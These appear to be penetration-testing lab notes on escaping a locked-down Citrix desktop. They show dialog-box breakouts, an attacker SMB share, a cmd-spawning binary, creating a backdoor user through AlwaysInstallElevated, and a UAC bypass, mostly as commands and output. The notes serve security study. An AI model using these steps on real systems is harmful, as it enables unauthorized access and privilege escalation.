# Citrix Breakout ## Install Citrix Receiver {% embed url="" %} Download Debian package {% embed url="" %} ``` osboxes@osboxes:~/Downloads$ sudo chmod 644 icaclient_24.5.0.76_amd64.deb osboxes@osboxes:~/Downloads$ sudo apt install -f ./icaclient_24.5.0.76_amd64.deb ``` If "Network data corrupted - HDX has detected corrupted server data, session can not continue":

Use an older Citrix receiver version: ``` $ wget https://deb.gymkirchenfeld.ch/pool/main/i/icaclient/icaclient_23.5.0.58_amd64.deb $ sudo chmod 644 icaclient_23.5.0.58_amd64.deb $ sudo dpkg -i /home/osboxes/Downloads/icaclient_23.5.0.58_amd64.deb ``` {% embed url="" %} ## Breakout Features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, and Print, usually provide an attacker with an opportunity to invoke a Windows dialog box. There are multiple ways to open dialog box in windows using tools such as Paint, Notepad, Wordpad, etc. ### With Paint Run `Paint` from start menu and click on `File > Open` to open the Dialog Box.

With the windows dialog box open for paint, we can enter the [UNC](https://learn.microsoft.com/en-us/dotnet/standard/io/file-path-formats#unc-paths) path `\\127.0.0.1\c$\users\pmorgan` under the File name field, with File-Type set to `All Files` and upon hitting enter we gain access to the desired directory. ### Create .bat file {% embed url="" %} ## Accessing SMB share from restricted environment ```shell-session smbserver.py -smb2support share $(pwd) ```

Right-click on the `pwn.exe` binary and select `Open`, which should prompt us to run it and a cmd console will be opened. pwn.exe: ```c #include int main() { system("C:\\Windows\\System32\\cmd.exe"); } ``` {% embed url="" %} `Explorer++` to copy files from the `\\10.13.38.95\share` location to the Desktop belonging to the user `pmorgan`. Being a portable application, it can be executed directly without the need for installation ## Alternate Registry Editors Alternative Registry editors can be employed to bypass the standard group policy restrictions. [Simpleregedit](https://sourceforge.net/projects/simpregedit/), [Uberregedit](https://sourceforge.net/projects/uberregedit/) and [SmallRegistryEditor](https://sourceforge.net/projects/sre/) are examples of such GUI tools ## Modify existing shortcut file ``` C:\Windows\System32\cmd.exe ```

Other options: transfer an existing shortcut file using an SMB server. Alternatively, we can create a new shortcut file using PowerShell ## Script Execution 1. Create a new text file and name it "evil.bat". 2. Open "evil.bat" with a text editor such as Notepad. 3. Input the command "cmd" into the file.

## Escalating Privileges WinPeas or PowerUp -> **AlwaysInstallElevated** {% content-ref url="miscellaneous-techniques" %} [miscellaneous-techniques](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/miscellaneous-techniques) {% endcontent-ref %} ```cmd-session C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer AlwaysInstallElevated REG_DWORD 0x1 C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer AlwaysInstallElevated REG_DWORD 0x1 ``` ```powershell-session PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1 PS C:\Users\pmorgan\Desktop> Write-UserAddMSI Output Path ----------- UserAdd.msi ```

```cmd-session C:\> runas /user:backdoor cmd Enter the password for backdoor: T3st@123 Attempting to start cmd as user "VDESKTOP3\backdoor" ... ``` ## Bypass UAC ```cmd-session C:\Windows\system32> cd C:\Users\Administrator Access is denied. ``` ```powershell-session PS C:\Users\Public> Import-Module .\Bypass-UAC.ps1 PS C:\Users\Public> Bypass-UAC -Method UacMethodSysprep ```